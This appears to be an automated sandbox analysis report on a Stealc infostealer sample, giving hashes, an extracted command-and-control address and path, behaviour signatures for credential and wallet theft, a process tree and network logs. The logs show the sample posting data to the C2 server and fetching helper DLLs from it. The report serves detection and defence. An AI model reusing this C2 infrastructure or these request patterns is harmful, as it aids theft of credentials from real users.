Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-10-2024 06:21

General

  • Target

    9714d301c8b96c7263dea4a36ddbdf74896d31f648d2836fa2d2642dccca17e8.exe

  • Size

    493KB

  • MD5

    7c6083bf70e2919d0957ffcb7b75ebeb

  • SHA1

    89254f92c908c0d99d150649aab4fdea7fc10b34

  • SHA256

    9714d301c8b96c7263dea4a36ddbdf74896d31f648d2836fa2d2642dccca17e8

  • SHA512

    ba7c4f25f83cfde35252920821707322e3523b3e47bb221239082fce3e3eb6811d302a24c1583bed3d8ddb54a6bb3e99ee6d2c5d3d2f5425ded550b82bcf16e8

  • SSDEEP

    12288:PtVE8S9QVK+gLgDWuaQ3HQ0RJaE5hZVQgqt2oRAAn4S:PfS9RkKO3w0RJaOQgq0oRAA4

Malware Config

Extracted

Family

stealc

Botnet

default

C2

http://46.8.231.109

Attributes
  • url_path

    /c4754d4f680ead72.php

Signatures

  • Stealc

    Stealc is an infostealer written in C++.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Loads dropped DLL 2 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9714d301c8b96c7263dea4a36ddbdf74896d31f648d2836fa2d2642dccca17e8.exe
    "C:\Users\Admin\AppData\Local\Temp\9714d301c8b96c7263dea4a36ddbdf74896d31f648d2836fa2d2642dccca17e8.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3320
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:844
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\IIJEBAECGC.exe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:212
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 236
      2⤵
      • Program crash
      PID:4884
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3320 -ip 3320
    1⤵
    PID:1956

Network

    • flag-cz
      GET
      http://46.8.231.109/
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET / HTTP/1.1
      Host: 46.8.231.109
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA
      Host: 46.8.231.109
      Content-Length: 214
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 180
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB
      Host: 46.8.231.109
      Content-Length: 268
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 1520
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----BAAEHDBFIDAFIDHJEBFB
      Host: 46.8.231.109
      Content-Length: 267
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 7116
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHI
      Host: 46.8.231.109
      Content-Length: 268
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:49 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 108
      Keep-Alive: timeout=5, max=96
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ
      Host: 46.8.231.109
      Content-Length: 4695
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:50 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=95
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:50 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
      ETag: "10e436-5e7eeebed8d80"
      Accept-Ranges: bytes
      Content-Length: 1106998
      Content-Type: application/x-msdos-program
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI
      Host: 46.8.231.109
      Content-Length: 723
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=93
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJ
      Host: 46.8.231.109
      Content-Length: 363
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=92
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFI
      Host: 46.8.231.109
      Content-Length: 363
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=91
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "a7550-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 685392
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:51 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "94750-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 608080
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:52 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "6dde8-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 450024
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:52 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "1f3950-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 2046288
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:52 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "3ef50-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 257872
      Content-Type: application/x-msdos-program
    • flag-cz
      GET
      http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
      Host: 46.8.231.109
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
      ETag: "13bf0-5e7ebd4425100"
      Accept-Ranges: bytes
      Content-Length: 80880
      Content-Type: application/x-msdos-program
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
      Host: 46.8.231.109
      Content-Length: 947
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=84
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE
      Host: 46.8.231.109
      Content-Length: 267
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 2408
      Keep-Alive: timeout=5, max=83
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEB
      Host: 46.8.231.109
      Content-Length: 265
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=82
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFID
      Host: 46.8.231.109
      Content-Length: 363
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Content-Length: 0
      Keep-Alive: timeout=5, max=81
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE
      Host: 46.8.231.109
      Content-Length: 272
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Thu, 10 Oct 2024 06:21:53 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Vary: Accept-Encoding
      Content-Length: 96
      Keep-Alive: timeout=5, max=80
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-cz
      POST
      http://46.8.231.109/c4754d4f680ead72.php
      MSBuild.exe
      Remote address:
      46.8.231.109:80
      Request
      POST /c4754d4f680ead72.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
      Host: 46.8.231.109
      Content-Length: 272
      Connection: Keep-Alive
      Cache-Control: no-cache
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.ax-0001.ax-msedge.net
      g-bing-com.ax-0001.ax-msedge.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=2FE89280B2C8675428E18794B30A660F; domain=.bing.com; expires=Tue, 04-Nov-2025 06:21:49 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 69837CB0C01349A695C7F8FF0CF670B1 Ref B: LON601060105060 Ref C: 2024-10-10T06:21:49Z
      date: Thu, 10 Oct 2024 06:21:49 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2FE89280B2C8675428E18794B30A660F
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=WQH1mNrpRlIGV_U8oWja8vgtTw9KUsoDhk_LMPr3slY; domain=.bing.com; expires=Tue, 04-Nov-2025 06:21:50 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: DBEC943E8F144DB38C26602E690A1BB4 Ref B: LON601060105060 Ref C: 2024-10-10T06:21:50Z
      date: Thu, 10 Oct 2024 06:21:49 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2FE89280B2C8675428E18794B30A660F; MSPTC=WQH1mNrpRlIGV_U8oWja8vgtTw9KUsoDhk_LMPr3slY
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: A1BA6CC0B58442B18D09B7E52B7C7208 Ref B: LON601060105060 Ref C: 2024-10-10T06:21:50Z
      date: Thu, 10 Oct 2024 06:21:49 GMT
    • flag-us
      DNS
      109.231.8.46.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      109.231.8.46.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      68.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      68.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      88.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      88.210.23.2.in-addr.arpa
      IN PTR
      Response
      88.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-88deploystaticakamaitechnologiescom
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      55.36.223.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      55.36.223.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      nsdm.cumpar-auto-orice-tip.ro
      MSBuild.exe
      Remote address:
      8.8.8.8:53
      Request
      nsdm.cumpar-auto-orice-tip.ro
      IN A
      Response
    • flag-us
      DNS
      212.20.149.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      212.20.149.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      103.209.201.84.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      103.209.201.84.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      83.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      83.210.23.2.in-addr.arpa
      IN PTR
      Response
      83.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-83deploystaticakamaitechnologiescom
    • flag-us
      DNS
      83.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      83.210.23.2.in-addr.arpa
      IN PTR
    • flag-us
      DNS
      30.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      30.243.111.52.in-addr.arpa
      IN PTR
      Response
    • 46.8.231.109:80
      http://46.8.231.109/c4754d4f680ead72.php
      http
      MSBuild.exe
      210.3kB
      5.4MB
      3920
      3907

      HTTP Request

      GET http://46.8.231.109/

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll

      HTTP Response

      200

      HTTP Request

      GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php

      HTTP Response

      200

      HTTP Request

      POST http://46.8.231.109/c4754d4f680ead72.php
    • 150.171.28.10:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=
      tls, http2
      2.0kB
      9.4kB
      22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=4ea9b7972a7c4a64acc2cd1484139d1a&localId=w:E8C31A05-90CA-DE8F-A29D-2E3C02D092EA&deviceId=6966572651686081&anid=

      HTTP Response

      204
    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      148 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      150.171.28.10
      150.171.27.10

    • 8.8.8.8:53
      109.231.8.46.in-addr.arpa
      dns
      71 B
      131 B
      1
      1

      DNS Request

      109.231.8.46.in-addr.arpa

    • 8.8.8.8:53
      68.159.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      68.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      88.210.23.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      88.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      55.36.223.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      55.36.223.20.in-addr.arpa

    • 8.8.8.8:53
      nsdm.cumpar-auto-orice-tip.ro
      dns
      MSBuild.exe
      75 B
      140 B
      1
      1

      DNS Request

      nsdm.cumpar-auto-orice-tip.ro

    • 8.8.8.8:53
      212.20.149.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      212.20.149.52.in-addr.arpa

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      103.209.201.84.in-addr.arpa
      dns
      73 B
      133 B
      1
      1

      DNS Request

      103.209.201.84.in-addr.arpa

    • 8.8.8.8:53
      83.210.23.2.in-addr.arpa
      dns
      140 B
      133 B
      2
      1

      DNS Request

      83.210.23.2.in-addr.arpa

      DNS Request

      83.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      30.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      30.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

    • C:\ProgramData\mozglue.dll

      Filesize

      593KB

      MD5

      c8fd9be83bc728cc04beffafc2907fe9

      SHA1

      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

      SHA256

      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

      SHA512

